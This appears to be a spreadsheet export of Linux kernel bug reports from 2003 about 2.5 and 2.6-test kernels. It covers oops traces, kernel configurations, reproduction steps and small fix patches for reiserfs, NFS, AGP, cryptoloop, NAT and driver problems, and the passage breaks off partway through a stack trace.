    <t>Distribution: SLES8 for ppc Hardware Environment: IBM p630 p630test:/ # cat /proc/cpuinfo processor : 0 cpu : POWER4 (gp) clock : 1002MHz revision : 3.2 timebase : 125289462 machine : CHRP IBM,7028-6C4 p630test:/ # cat /proc/meminfo total: used: free: shared: buffers: cached: Mem: 2047410176 1156739072 890671104 0 109207552 888205312 Swap: 1073733632 0 1073733632 MemTotal: 1999424 kB MemFree: 869796 kB MemShared: 0 kB Buffers: 106648 kB Cached: 867388 kB SwapCached: 0 kB Active: 298680 kB Inactive: 694068 kB HighTotal: 0 kB HighFree: 0 kB LowTotal: 1999424 kB LowFree: 869796 kB SwapTotal: 1048568 kB SwapFree: 1048568 kB Software Environment: Gnu C gcc (GCC) 3.2 Copyright (C) 2002 Free Software Foundation, Inc. This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. Gnu make 3.79.1 util-linux 2.11u mount 2.11u modutils 2.4.19 e2fsprogs 1.28 PPP 2.4.1 isdn4k-utils 3.2p1 Linux C Library x 1 root root 1351811 Nov 12 2002 /lib/libc.so.6 Dynamic linker (ldd) 2.2.5 Linux C++ Library 5.0.0 Procps 2.0.7 Net-tools 1.60 Kbd 1.06 Sh-utils 2.0 Modules Loaded ipv6 e100 lvm-mod Problem Description: The harddisk space can't be released after ltp runs if the partition is reiserfs. The harddisk space before LTP runs is: p630test:~ # df Filesystem 1K-blocks Used Available Use% Mounted on /dev/sda3 16721404 3203824 13517580 20% / Run ltp: ./runalltest -l ltp.log -o ltp.out -f "/ltp-full-20030606/runtest/fs" The harddisk space after a cycle of LTP runs is: p630test:~ # df Filesystem 1K-blocks Used Available Use% Mounted on /dev/sda3 16721404 5379176 11342228 33% / We can see more than 2G space consumed after one cycle of LTP, but there is no temp file generated by ltp and log files only used less than 2M. I can't find out which file or dir consumes so much space. When I use du to check and calculate the total used space, it is about 3G, but not 5G. Some comments: (1) There is no such space growth when I use ext3 file system. (2) There is no such space growth when I use 2.4 kernel shipped with SLES8 for ppc and several other 2.4 kernel on i386 platform(using reiserfs or ext3). (3) The harddisk used space will keep growing and growing until no space left on that partition if I continue to run ltp. (4) ltp build is 20030606. Steps to reproduce: 1. Update kernel to 2.5.72 on p630. 2. Format a patition as reiserfs. The directory where ltp create temporary files should be reiserfs. The default directory is /tmp and user can define it by runalltest option -d. 3. Run ltp. ./runalltest.sh -p -l ltp.log -o ltp.out or ./runalltest -l ltp.log -o ltp.out -f &lt;ltpdir&gt;/runtest/fs</t>
  </si>
  <si>
    <t>2003-07-10 21:08 UTC</t>
  </si>
  <si>
    <t>Mohammad Bahathir Hashim</t>
  </si>
  <si>
    <t>2003-07-12 18:48 UTC</t>
  </si>
  <si>
    <t>Distribution:Slackware v7.1 : glibc v2.1.3 Hardware Environment: P!!! 550 MHz, 256 MB RAM. HP Brio BA600 Software Environment:# lspci 00:00.0 Host bridge: Intel Corporation 440BX/ZX - 82443BX/ZX Host bridge (rev 03) 00:01.0 PCI bridge: Intel Corporation 440BX/ZX - 82443BX/ZX AGP bridge (rev 03) 00:04.0 Multimedia audio controller: Cirrus Logic CS 4614/22/24 [CrystalClear SoundFusion Audio Accelerator] (rev 01) 00:07.0 ISA bridge: Intel Corporation 82371AB PIIX4 ISA (rev 02) 00:07.1 IDE interface: Intel Corporation 82371AB PIIX4 IDE (rev 01) 00:07.2 USB Controller: Intel Corporation 82371AB PIIX4 USB (rev 01) 00:07.3 Bridge: Intel Corporation 82371AB PIIX4 ACPI (rev 02) 00:0f.0 Ethernet controller: Accton Technology Corporation SMC2-1211TX (rev 10) 00:12.0 Multimedia audio controller: Creative Labs SB Live! EMU10000 (rev 07) 00:12.1 Input device controller: Creative Labs SB Live! (rev 07) 01:00.0 VGA compatible controller: Matrox Graphics, Inc. MGA G200 AGP (rev 03) Problem Description: 1) lmbench v3.0 indicates VERY slow file handling since v2.5.74. I am using reiserfs as a default FS. File &amp; VM system latencies in microseconds - smaller is better ------------------------------------------------------------------------------- Host OS 0K File 10K File Mmap Prot Page 100fd Create Delete Create Delete Latency Fault Fault selct --------- ------------- ------ ------ ------ ------ ------- ----- ------- ----- vfr Linux 2.5.72 92.9 6.2000 272.0 6.4290 1120.0 0.836 3.12030 13.6 vfr Linux 2.5.73 94.8 4.1030 197.8 4.2720 1076.0 0.782 2.85340 11.1 *vfr Linux 2.5.74 155.4 170.4 391.8 247.7 1111.0 0.781 2.95210 11.1 *vfr Linux 2.5.75 153.1 163.0 381.4 225.6 1044.0 0.656 2.77480 11.0 2) System stop responding while extracting big tar.bz2 archive file; example; MozillaFirebird.tar.bz2 (about 32MB). ps indicates that sistem stuck at tar process (pid 3607) # ps aux root 3598 0.0 0.0 0 0 ? SW 11:26 0:00 [rpciod] root 3599 0.0 0.0 0 0 ? SW 11:26 0:00 [lockd] root 3608 13.4 1.5 4712 4000 vc/1 S 11:27 0:58 bzip2 -d root 3607 4.4 0.7 3428 1848 vc/1 D 11:27 0:19 tar xvfy /mnt/nfs/mozilla/MozillaFirebird-0.6-source.tar.bz2 # cat /proc/vmstat nr_dirty 26052 nr_writeback 0 nr_unstable 0 nr_page_table_pages 92 nr_mapped 3224 nr_slab 4825 pgpgin 101596 pgpgout 392800 pswpin 0 pswpout 0 pgalloc 6592963 pgfree 6594126 pgactivate 53079 pgdeactivate 12278 pgfault 3215804 pgmajfault 420 pgscan 56954 pgrefill 13927 pgsteal 56118 pginodesteal 0 kswapd_steal 54230 kswapd_inodesteal 8706 pageoutrun 141 allocstall 59 pgrotated 0 Load average also VERY high ... more than 4.00. Steps to reproduce: CONFIG_X86=y CONFIG_MMU=y CONFIG_UID16=y CONFIG_GENERIC_ISA_DMA=y CONFIG_EXPERIMENTAL=y CONFIG_SWAP=y CONFIG_SYSVIPC=y CONFIG_SYSCTL=y CONFIG_LOG_BUF_SHIFT=14 CONFIG_FUTEX=y CONFIG_EPOLL=y CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y CONFIG_OBSOLETE_MODPARM=y CONFIG_KMOD=y CONFIG_X86_PC=y CONFIG_MPENTIUMIII=y CONFIG_X86_CMPXCHG=y CONFIG_X86_XADD=y CONFIG_X86_L1_CACHE_SHIFT=5 CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_GOOD_APIC=y CONFIG_X86_INTEL_USERCOPY=y CONFIG_X86_USE_PPRO_CHECKSUM=y CONFIG_PREEMPT=y CONFIG_X86_TSC=y CONFIG_NOHIGHMEM=y CONFIG_MTRR=y CONFIG_HAVE_DEC_LOCK=y CONFIG_PCI=y CONFIG_PCI_GOANY=y CONFIG_PCI_BIOS=y CONFIG_PCI_DIRECT=y CONFIG_PCI_NAMES=y CONFIG_ISA=y CONFIG_HOTPLUG=y CONFIG_PCMCIA_PROBE=y CONFIG_KCORE_ELF=y CONFIG_BINFMT_ELF=y CONFIG_PARPORT=m CONFIG_PARPORT_PC=m CONFIG_PARPORT_PC_CML1=m CONFIG_PARPORT_1284=y CONFIG_BLK_DEV_FD=y CONFIG_BLK_DEV_LOOP=m CONFIG_IDE=y CONFIG_BLK_DEV_IDE=y CONFIG_BLK_DEV_IDEDISK=y CONFIG_IDEDISK_MULTI_MODE=y CONFIG_BLK_DEV_IDECD=y CONFIG_IDE_TASKFILE_IO=y CONFIG_BLK_DEV_IDEPCI=yCONFIG_IDEPCI_SHARE_IRQ=y CONFIG_BLK_DEV_IDEDMA_PCI=y CONFIG_IDEDMA_PCI_AUTO=y CONFIG_BLK_DEV_IDEDMA=y CONFIG_BLK_DEV_ADMA=y CONFIG_BLK_DEV_PIIX=y CONFIG_IDEDMA_AUTO=y CONFIG_BLK_DEV_IDE_MODES=y CONFIG_SCSI=m CONFIG_BLK_DEV_SD=m CONFIG_BLK_DEV_SR=m CONFIG_BLK_DEV_SR_VENDOR=y CONFIG_CHR_DEV_SG=m CONFIG_SCSI_MULTI_LUN=y CONFIG_SCSI_REPORT_LUNS=y CONFIG_SCSI_CONSTANTS=y CONFIG_NET=y CONFIG_PACKET=y CONFIG_NETFILTER=y CONFIG_UNIX=y CONFIG_INET=y CONFIG_IP_MULTICAST=y CONFIG_IP_NF_CONNTRACK=m CONFIG_IP_NF_FTP=m CONFIG_IP_NF_IRC=m CONFIG_IP_NF_TFTP=m CONFIG_IP_NF_AMANDA=m CONFIG_IP_NF_IPTABLES=m CONFIG_IP_NF_MATCH_LIMIT=m CONFIG_IP_NF_MATCH_MAC=m CONFIG_IP_NF_MATCH_PKTTYPE=m CONFIG_IP_NF_MATCH_MARK=m CONFIG_IP_NF_MATCH_MULTIPORT=m CONFIG_IP_NF_MATCH_TOS=m CONFIG_IP_NF_MATCH_ECN=m CONFIG_IP_NF_MATCH_DSCP=m CONFIG_IP_NF_MATCH_AH_ESP=m CONFIG_IP_NF_MATCH_LENGTH=m CONFIG_IP_NF_MATCH_TTL=m CONFIG_IP_NF_MATCH_TCPMSS=m CONFIG_IP_NF_MATCH_HELPER=m CONFIG_IP_NF_MATCH_STATE=m CONFIG_IP_NF_MATCH_CONNTRACK=m CONFIG_IP_NF_MATCH_UNCLEAN=m CONFIG_IP_NF_MATCH_OWNER=m CONFIG_IP_NF_FILTER=m CONFIG_IP_NF_TARGET_REJECT=m CONFIG_IP_NF_TARGET_MIRROR=m CONFIG_IP_NF_NAT=m CONFIG_IP_NF_NAT_NEEDED=y CONFIG_IP_NF_TARGET_MASQUERADE=m CONFIG_IP_NF_TARGET_REDIRECT=m CONFIG_IP_NF_NAT_IRC=m CONFIG_IP_NF_NAT_FTP=m CONFIG_IP_NF_NAT_TFTP=m CONFIG_IP_NF_NAT_AMANDA=m CONFIG_IP_NF_MANGLE=m CONFIG_IP_NF_TARGET_TOS=m CONFIG_IP_NF_TARGET_ECN=m CONFIG_IP_NF_TARGET_DSCP=m CONFIG_IP_NF_TARGET_MARK=m CONFIG_IP_NF_TARGET_LOG=m CONFIG_IP_NF_TARGET_TCPMSS=m CONFIG_IP_NF_ARPTABLES=m CONFIG_IP_NF_ARPFILTER=m CONFIG_IPV6_SCTP__=y CONFIG_NETDEVICES=y CONFIG_DUMMY=m CONFIG_BONDING=m CONFIG_TUN=m CONFIG_NET_ETHERNET=y CONFIG_NET_PCI=y CONFIG_8139TOO=y CONFIG_PLIP=m CONFIG_PPP=m CONFIG_PPP_MULTILINK=y CONFIG_PPP_FILTER=y CONFIG_PPP_ASYNC=m CONFIG_PPP_SYNC_TTY=m CONFIG_PPP_DEFLATE=m CONFIG_PPP_BSDCOMP=m CONFIG_PPPOE=m CONFIG_INPUT=y CONFIG_INPUT_MOUSEDEV=y CONFIG_INPUT_MOUSEDEV_PSAUX=y CONFIG_INPUT_MOUSEDEV_SCREEN_X=1024 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=768 CONFIG_SOUND_GAMEPORT=y CONFIG_SERIO=y CONFIG_SERIO_I8042=y CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y CONFIG_INPUT_MOUSE=y CONFIG_MOUSE_PS2=y CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y CONFIG_SERIAL_8250=y CONFIG_SERIAL_CORE=y CONFIG_UNIX98_PTYS=y CONFIG_UNIX98_PTY_COUNT=256 CONFIG_PRINTER=m CONFIG_RTC=y CONFIG_AGP=y CONFIG_AGP_INTEL=y CONFIG_DRM=y CONFIG_DRM_MGA=y CONFIG_EXT2_FS=y CONFIG_EXT2_FS_XATTR=y CONFIG_FS_MBCACHE=y CONFIG_REISERFS_FS=y CONFIG_AUTOFS4_FS=m CONFIG_ISO9660_FS=m CONFIG_JOLIET=y CONFIG_BLK_DEV_GENERIC=y CONFIG_UDF_FS=y CONFIG_FAT_FS=m CONFIG_VFAT_FS=m CONFIG_NTFS_FS=m CONFIG_NTFS_RW=y CONFIG_PROC_FS=y CONFIG_DEVFS_FS=y CONFIG_DEVFS_MOUNT=y CONFIG_DEVPTS_FS=y CONFIG_TMPFS=y CONFIG_RAMFS=y CONFIG_NFS_FS=m CONFIG_NFS_V3=y CONFIG_NFS_V4=y CONFIG_NFSD=m CONFIG_NFSD_V3=y CONFIG_NFSD_V4=y CONFIG_NFSD_TCP=y CONFIG_LOCKD=m CONFIG_LOCKD_V4=y CONFIG_EXPORTFS=m CONFIG_SUNRPC=m CONFIG_SUNRPC_GSS=m CONFIG_MSDOS_PARTITION=y CONFIG_NLS=y CONFIG_NLS_DEFAULT="iso8859-1" CONFIG_NLS_CODEPAGE_437=y CONFIG_NLS_ISO8859_1=y CONFIG_VIDEO_SELECT=y CONFIG_VGA_CONSOLE=y CONFIG_DUMMY_CONSOLE=y CONFIG_SOUND=y CONFIG_SND=y CONFIG_SND_SEQUENCER=m CONFIG_SND_OSSEMUL=y CONFIG_SND_MIXER_OSS=m CONFIG_SND_PCM_OSS=m CONFIG_SND_SEQUENCER_OSS=y CONFIG_SND_RTCTIMER=y CONFIG_SND_EMU10K1=m CONFIG_USB=y CONFIG_USB_DEVICEFS=y CONFIG_USB_UHCI_HCD=y CONFIG_USB_STORAGE=m CONFIG_USB_MOUSE=y CONFIG_ZLIB_INFLATE=m CONFIG_ZLIB_DEFLATE=m CONFIG_X86_BIOS_REBOOT=y Extra configurations: /usr/src/linux/Makefile modifcation HOSTCFLAGS = -Wall -Wstrict-prototypes -Os -s -fomit-frame-pointer /usr/src/linux/i366/Makefile cflags-$(CONFIG_MPENTIUMIII) += $(call check_gcc,-march=pentium3 -mmmx -msse, -march=i686) I hope this report enough to solve the problem... Best wish... Yours, Mohammad Bahathir Hashim MALAYSIA.</t>
  </si>
  <si>
    <t>tcp_frto lacks documentation</t>
  </si>
  <si>
    <t>2.5.74-bk7</t>
  </si>
  <si>
    <t>2003-07-10 21:36 UTC</t>
  </si>
  <si>
    <t>2004-07-30 09:42 UTC</t>
  </si>
  <si>
    <t>Kernel oops with nfs3svc_decode_symlinkargs</t>
  </si>
  <si>
    <t>2.5.75-bk1</t>
  </si>
  <si>
    <t>2003-07-11 13:32 UTC</t>
  </si>
  <si>
    <t>2003-11-26 16:38 UTC</t>
  </si>
  <si>
    <t>Distribution:SuSE 8.0 Hardware Environment: Server from NFS testplan at http://ltp.sf.net/nfs Software Environment: Gnu C 2.95.3 Gnu make 3.79.1 util-linux 2.11n mount 2.11n module-init-tools 2.4.12 e2fsprogs 1.26 jfsutils 1.0.15 xfsprogs 2.0.0 PPP 2.4.1 isdn4k-utils 3.1pre4 Linux C Library x 1 root root 1394238 Mar 23 2002 /lib/libc.so.6 Dynamic linker (ldd) 2.2.5 Procps 2.0.7 Net-tools 1.60 Kbd 1.06 Sh-utils 2.0 NFS-utils 1.0.3 No Modules Loaded Problem Description: After starting the test scenario, the following kernel oops occurs on the server. ======================== Unable to handle kernel paging request at virtual address f45d0000 printing eip: c01c1383 *pde = 00000000 Oops: 0000 [#1] CPU: 0 EIP: 0060:[nfs3svc_decode_symlinkargs+723/844] Not tainted EFLAGS: 00010206 EIP is at nfs3svc_decode_symlinkargs+0x2d3/0x34c eax: f2764f3c ebx: 00000000 ecx: f45d0000 edx: f44a5078 esi: f445c004 edi: 0000004e ebp: f3b7df4c esp: f3b7df30 ds: 007b es: 007b ss: 0068 Process nfsd (pid: 1211, threadinfo=f3b7c000 task=f44f6000) Stack: f44f7014 f445c004 c04f93e8 f44a50fc f2764f3c 00000003 00000011 f3b7df6c c01b536b f445c004 f45cf068 f44a5004 f44f7014 f445c0e0 f44a41d8 f3b7dfa4 c042d3ad f445c004 f44f7014 00164e2d 00164e2d f3b7c000 000001d4 00000003 Call Trace: [nfsd_dispatch+127/409] nfsd_dispatch+0x7f/0x199 [svc_process+973/1626] svc_process+0x3cd/0x65a [nfsd+492/864] nfsd+0x1ec/0x360 [nfsd+0/864] nfsd+0x0/0x360 [kernel_thread_helper+5/12] kernel_thread_helper+0x5/0xc Code: 8a 11 84 d2 74 04 85 db 75 e6 85 ff 74 4b 85 db 75 39 8b 75 ======================== Steps to reproduce: Execute the test scenario from the NFS 2.5 Testplan.</t>
  </si>
  <si>
    <t>Autorepeat storm on USB keyboard resulting in X/matroxfb intermingling on G400 system</t>
  </si>
  <si>
    <t>2.5.75-bk1 (and probably a few versions before) to 2.6.0-test5</t>
  </si>
  <si>
    <t>2003-07-12 01:19 UTC</t>
  </si>
  <si>
    <t>2004-02-04 14:28 UTC</t>
  </si>
  <si>
    <t>Distribution: Red Hat Raw Hide Hardware Environment: http://www.giga-byte.com/products/7vax.htm (Via KT 400 + Via VT 8235 + Realtek RTL8100BL), F10 bios, matrox g400, pure ehci input (usb1 mouse &amp; keyboard on external ehci hub), Hercules Fortissimo III 7.1 ... Software Environment: XFree86-4.3.0-15.1, gcc-3.3-12 Problem Description: This is an intermitent problem I've had in the last months with whatever 2.5 kernel I was testing at the time. It is rare, does not manifests itself under particular load, and renders the computer totally unusable (must do a system reset to get it back). I've filled it under usb even though it might be a console/fb/intut/whatever bug. I think I hit this about half a dozen time already. This time I managed to photograph the screen. Suddenly keyboard locks &amp; the mouse cursor is shadowed by the console cursor (ie the console mouse cursor appears in the middle of the screen and follows the X cursor movements at a distance). After a few seconds (I think), keyboard input switches to autorepeat and proceeds to fill whatever field was focused at the time with garbage. Keyboard stays locked, hitting num lock for example won't change the num lock status. Steps to reproduce: Unknown. Today I had evo open and was sending a message, and this was about the only activity on the system. It's too rare to get any occurrence pattern - I'm typing this on the very same kernel that locked for example. It might be matroxfb related, I don't think I had it when matroxfb was broken (but then lots of other changes went into the kernel since this time too)</t>
  </si>
  <si>
    <t>Roger Luethi</t>
  </si>
  <si>
    <t>Slab corruption</t>
  </si>
  <si>
    <t>2003-07-12 15:26 UTC</t>
  </si>
  <si>
    <t>2003-08-19 11:08 UTC</t>
  </si>
  <si>
    <t>I've seen quite a bit of slab corruption while trying to get some Palm device to sync with my computer. dmesg output attached.</t>
  </si>
  <si>
    <t>build failure: arch/ppc/kernel/time.c</t>
  </si>
  <si>
    <t>2.6.0-test1</t>
  </si>
  <si>
    <t>2003-07-14 07:53 UTC</t>
  </si>
  <si>
    <t>2003-07-17 18:42 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: Apple PowerMac G4, 400MHz, AGP Graphics Software Environment: gcc 2.95.3 Problem Description: make[1]: `arch/ppc/kernel/asm-offsets.s' is up to date. CHK include/linux/compile.h CC arch/ppc/kernel/time.o arch/ppc/kernel/time.c: In function `do_settimeofday': arch/ppc/kernel/time.c:247: conflicting types for `new_nsec' arch/ppc/kernel/time.c:245: previous declaration of `new_nsec' arch/ppc/kernel/time.c:247: conflicting types for `new_sec' arch/ppc/kernel/time.c:244: previous declaration of `new_sec' make[1]: *** [arch/ppc/kernel/time.o] Error 1 make: *** [arch/ppc/kernel] Error 2 This has actually been happening since 2.5.75-bk1, but I didn't notice until now. 2.5.75 compiles OK and seems to be running OK. Steps to reproduce: Try to compile. That's it. I'll attach my .config to this bug as soon as I can (that might be in a few minutes, or it might be several hours).</t>
  </si>
  <si>
    <t>Kernel oops during loading parport_pc module</t>
  </si>
  <si>
    <t>2003-08-03 02:30 UTC</t>
  </si>
  <si>
    <t>Distribution: Red Hat 9 Hardware Environment: Pentium II/ Intel 440BX Software Environment: Problem Description: Kernel oops during system boot when kudzu tries to detect hardware. Steps to reproduce:</t>
  </si>
  <si>
    <t>2.5.75 (2.5.75-bkX and 2.6.0-test1 don't compile due to bug 919)</t>
  </si>
  <si>
    <t>2003-07-14 08:05 UTC</t>
  </si>
  <si>
    <t>2003-07-18 01:13 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: Apple PowerMac G4, 400MHz, AGP Graphics Software Environment: gcc 2.95.3 Problem Description: Uptime is listed as a seriously trippy/bogus 12247 days and counting... Example: barryn@barryn barryn $ uname -a Linux barryn 2.5.75 #1 Mon Jul 14 07:39:20 PDT 2003 ppc 7400, altivec supported GNU/Linux barryn@barryn barryn $ uptime 07:57:06 up 12247 days, 14:57, 7 users, load average: 0.17, 0.08, 0.05 Steps to reproduce: Just boot and run "uptime".</t>
  </si>
  <si>
    <t>Enabling CPU freq scaling on VIA Cyrix 3 causes kernel lockup / divide error</t>
  </si>
  <si>
    <t>2003-07-14 09:14 UTC</t>
  </si>
  <si>
    <t>Stephen Hassard</t>
  </si>
  <si>
    <t>2003-09-19 08:22 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sid Hardware Environment: VIA Epia 800 Software Environment: GCC 3.3 Problem Description: When I enable CPUFreq scaling with longhaul, the kernel crashes on startup with the following error: &gt;&gt; longhaul: VIA CPU detected. Longhaul version 2 supportred longhaul: VRM 8.5 : Min VID=1.250 Max VID=1.250, 0 possible voltage scales longhaul: MinMult(x10)=30 MaxMult(x10)=60 longhaul: Lowestspeed=0 Highestspeed=0 longhaul: FSB:0 Mult(x10):100 divide error: 0000 [#1] CPU: 0 &lt;&lt; Steps to reproduce: Enable VIA Cyrix 3 longhaul support, boot kernel on VIA Epia 800. Kernel crashes.</t>
  </si>
  <si>
    <t>sis900 causes Badness in pci_find_subsys at drivers/pci/search.c:132</t>
  </si>
  <si>
    <t>2003-07-14 12:19 UTC</t>
  </si>
  <si>
    <t>Rune Petersen</t>
  </si>
  <si>
    <t>2003-12-01 11:48 UTC</t>
  </si>
  <si>
    <t>Hardware Environment: sis900 network card Problem Description: when booting I get: Badness in pci_find_subsys at drivers/pci/search.c:132 Call Trace: [&lt;c01c14f1&gt;] pci_find_subsys+0xd1/0xe0 [&lt;c01c152f&gt;] pci_find_device+0x2f/0x40 [&lt;c021371c&gt;] sis630_set_eq+0x5c/0x2a0 [&lt;c0213a13&gt;] sis900_timer+0xb3/0x1f0 [&lt;c0213960&gt;] sis900_timer+0x0/0x1f0 [&lt;c011fba0&gt;] run_timer_softirq+0xb0/0x170 [&lt;c011bc9a&gt;] do_softirq+0x9a/0xa0 [&lt;c010ae49&gt;] do_IRQ+0xc9/0xf0 [&lt;c0106f40&gt;] default_idle+0x0/0x40 [&lt;c0106f40&gt;] default_idle+0x0/0x40 [&lt;c010929c&gt;] common_interrupt+0x18/0x20 [&lt;c0106f40&gt;] default_idle+0x0/0x40 [&lt;c0106f40&gt;] default_idle+0x0/0x40 [&lt;c0106f64&gt;] default_idle+0x24/0x40 [&lt;c0106ffa&gt;] cpu_idle+0x3a/0x50 [&lt;c0105000&gt;] _stext+0x0/0x30 [&lt;c0350702&gt;] start_kernel+0x132/0x140 [&lt;c0350470&gt;] unknown_bootoption+0x0/0x120 Steps to reproduce: boot the system up</t>
  </si>
  <si>
    <t>Booting from software raid causes null pointer</t>
  </si>
  <si>
    <t>2003-07-14 15:54 UTC</t>
  </si>
  <si>
    <t>Michael Renner</t>
  </si>
  <si>
    <t>2003-09-06 13:56 UTC</t>
  </si>
  <si>
    <t>Distribution: debian-testing Hardware Environment: three ide devices, one on the motherboards ide-controller (Via VT82C586/B/686A/B), two on Promise 20269 (IDE-Controller only, no raid functions used) Software Environment: ii binutils 2.14.90.0.4-0.1 The GNU assembler, linker and binary utilities. ii gcc-3.3 3.3.1-0pre0 The GNU C compiler Problem Description: Booting 2.6.0-test1 causes the error which can be seen at http://amd.co.at/images/bug.jpg , crippling the raid devices somewhat. After booting my old kernel (2.4.21) I got the errors which can be found in the attached text file (probably pretty irrelevant) My setup is as follows: datahaven:~# mount /dev/md2 on / type ext3 (rw,errors=remount-ro) proc on /proc type proc (rw) devpts on /dev/pts type devpts (rw,gid=5,mode=620) /dev/md0 on /boot type ext3 (rw,errors=remount-ro) /dev/md1 on /storage type ext3 (rw) datahaven:~# cat /proc/mdstat Personalities : [raid1] [raid5] read_ahead 1024 sectors md0 : active raid1 hdg1[0] hde1[2] hda1[1] 39936 blocks [3/1] [_U_] md2 : active raid5 hdg3[1] hde3[2] hda3[0] 5413376 blocks level 5, 256k chunk, algorithm 2 [3/3] [UUU] md1 : active raid5 hdg4[1] hde4[2] hda4[0] 234098688 blocks level 5, 256k chunk, algorithm 2 [3/3] [UUU] unused devices: &lt;none&gt; datahaven:~# I also attached the .config I used for 2.6.0-test1</t>
  </si>
  <si>
    <t>nvidia_agp module has unresolved symbols (includes fix)</t>
  </si>
  <si>
    <t>2003-07-14 21:17 UTC</t>
  </si>
  <si>
    <t>2003-09-19 08:15 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 1.4 Hardware Environment: Athlon-XP, Nvidia Nforce2 chipset Software Environment: Problem Description: WARNING: /lib/modules/2.6.0-test1/kernel/drivers/char/agp/nvidia-agp.ko needs unknown symbol agp_memory_reserved Steps to reproduce: CONFIG_AGP_NVIDIA=m Here's the (apparent) fix: --- drivers/char/agp/generic.c.orig 2003-07-14 22:54:19.000000000 -0400 +++ drivers/char/agp/generic.c 2003-07-15 00:14:03.000000000 -0400 @@ -39,6 +39,7 @@ __u32 *agp_gatt_table; int agp_memory_reserved; +EXPORT_SYMBOL(agp_memory_reserved); /* * Generic routines for handling agp_memory structures -</t>
  </si>
  <si>
    <t>cryptoloop has unresolved symbols (includes fix)</t>
  </si>
  <si>
    <t>2003-07-14 21:38 UTC</t>
  </si>
  <si>
    <t>2003-11-26 16:25 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 1.4 Hardware Environment: Athlon-XP, Nvidia NForce2 chipset Software Environment: Problem Description: WARNING: /lib/modules/2.6.0-test1/kernel/drivers/block/cryptoloop.ko needs unknown symbol crypto_alloc_tfm WARNING: /lib/modules/2.6.0-test1/kernel/drivers/block/cryptoloop.ko needs unknown symbol crypto_free_tfm Steps to reproduce: CONFIG_BLK_DEV_CRYPTOLOOP=m # CONFIG_CRYPTO is not set Fix: Obviously CONFIG_CRYPTO should be set. This is due to an error in the Kconfig. When the following patch is applied, the BLK_DEV_CRYPTOLOOP option will not appear unless CRYPTO is set, which fixes the unresolved symbol problem (works with both on or both off): --- drivers/block/Kconfig.orig 2003-07-14 22:54:19.000000000 -0400 +++ drivers/block/Kconfig 2003-07-15 00:33:33.000000000 -0400 @@ -264,7 +264,7 @@ config BLK_DEV_CRYPTOLOOP tristate "Cryptoloop Support" - depends on BLK_DEV_LOOP + depends on BLK_DEV_LOOP &amp;&amp; CRYPTO ---help--- Say Y here if you want to be able to use the ciphers that are provided by the CryptoAPI as loop transformation. This might be</t>
  </si>
  <si>
    <t>Virtual terminal should be enabled by default</t>
  </si>
  <si>
    <t>2003-07-15 03:14 UTC</t>
  </si>
  <si>
    <t>2004-01-23 15:23 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: Software Environment: Problem Description: CONFIG_VT should be default enabled, even if converting a 2.4 .config Steps to reproduce:</t>
  </si>
  <si>
    <t>[OSS] loading cs4232 yields "kobject_register failed"</t>
  </si>
  <si>
    <t>2003-07-15 08:39 UTC</t>
  </si>
  <si>
    <t>2003-11-09 10:59 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian/testing Hardware Environment: IBM Thinkpad 600 Problem Description: When loading OSS driver cs4232: pnp: the driver 'cs4232' has been registered kobject_register failed for cs4232 (-17) Call Trace: [&lt;c01ad4f9&gt;] kobject_register+0x59/0x60 [&lt;c01eadb4&gt;] bus_add_driver+0x54/0xd0 [&lt;c01eb291&gt;] driver_register+0x31/0x40 [&lt;c01bf431&gt;] pnp_register_driver+0x41/0x80 [&lt;c6a7e65f&gt;] init_cs4232+0x10f/0x11a [cs4232] [&lt;c0131746&gt;] sys_init_module+0x126/0x270 [&lt;c010936b&gt;] syscall_call+0x7/0xb &lt;Crystal audio controller (CS4238)&gt; at 0x530 irq 9 dma 1,0</t>
  </si>
  <si>
    <t>FTP NAT doesn't work in 2.6.0-test1</t>
  </si>
  <si>
    <t>2003-07-15 10:44 UTC</t>
  </si>
  <si>
    <t>2003-07-20 23:39 UTC</t>
  </si>
  <si>
    <t>Martin Josefsson</t>
  </si>
  <si>
    <t>Distribution: Red Hat 9 Hardware Environment: Software Environment: gcc-3.3 Problem Description: Both IP masquerading and SNAT do not work with FTP. When I issue dir command, ftp connection gets stuck. In ethernet sniffer I see a lot of TCP ack packets going in both directions. Both FTP client and server are Win2k boxes. Steps to reproduce: Setup a NAT box modprobe ip_nat_ftp modprobe ip_conntrack_ftp iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE (assuming eth0 is an external interface) Try ftp connection. This setup works fine with RedHat kernel 2.4.20-18.9.</t>
  </si>
  <si>
    <t>Oops in raw_rcv_skb if CONFIG_DEBUG_PAGEALLOC=y</t>
  </si>
  <si>
    <t>2003-07-15 14:42 UTC</t>
  </si>
  <si>
    <t>2003-12-18 07:06 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Testing Hardware Environment: Dual Pentium2 266, AIC-7880 SCSI, 3Com PCI 3c905C Tornado Software Environment: gcc 3.3.1, SMP kernel, preempt on Problem Description: When doing a ping flood of another machine on my same network (using multiple instances of 'ping -f hostname &amp;'), after about 10 seconds I get this oops, and the machines hangs: Unable to handle kernel paging request at virtual address c4f66068 printing eip: c02b6bd0 *pde = 00014067 *pte = 04f66000 Oops: 0000 [#1] CPU: 0 EIP: 0060:[&lt;c02b6bd0&gt;] Not tainted EFLAGS: 00010246 EIP is at raw_rcv_skb+0x190/0x260 eax: 00000040 ebx: c5321060 ecx: c4dae024 edx: 00000014 esi: c5160000 edi: c5321004 ebp: c4f66004 esp: c5161b80 ds: 007b es: 007b ss: 0068 Process ping (pid: 294, threadinfo=c5160000 task=c52cf000) Stack: c4f66000 c1169890 00001000 c532106c 00000216 00000000 c4f66000 0000005a c4f66004 c5321004 c4dae024 c510e004 